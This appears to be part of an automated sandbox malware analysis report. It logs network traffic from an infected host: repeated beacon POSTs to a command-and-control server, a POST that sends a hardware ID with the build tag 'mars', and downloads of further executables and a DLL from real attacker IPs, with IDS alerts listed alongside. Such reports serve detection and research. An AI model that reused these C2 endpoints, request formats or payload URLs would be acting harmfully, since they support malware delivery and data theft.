Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIDGDHCGCBAKFHIIIIIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 30 45 31 33 38 36 42 33 37 31 33 36 30 34 32 39 36 32 39 37 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 2d 2d 0d 0a Data Ascii: ------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="hwid"3A0E1386B3713604296297------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="build"mars------GHIDGDHCGCBAKFHIIIII--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49793 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49825 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49842 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49864 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49868 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49875 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49887 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49896 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49902 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49908 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49930 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49952 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49945 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49974 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49996 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49994 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49980 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50006 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50035 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50052 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50059 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50066 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50081 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50101 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50091 -> 104.21.33.116:443
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: GET /files/6856384433/fMb18eF.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/6856384433/QwGWuQZ.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: chrome.exe, 00000024.00000002.3103378526.00005818006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000024.00000003.2997235456.00005818006D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000024.00000002.3103378526.00005818006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000024.00000003.2997235456.00005818006D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000024.00000003.3039850507.00005818003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000024.00000003.3039953532.0000581800DA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000024.00000003.3040322237.0000581800310000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const 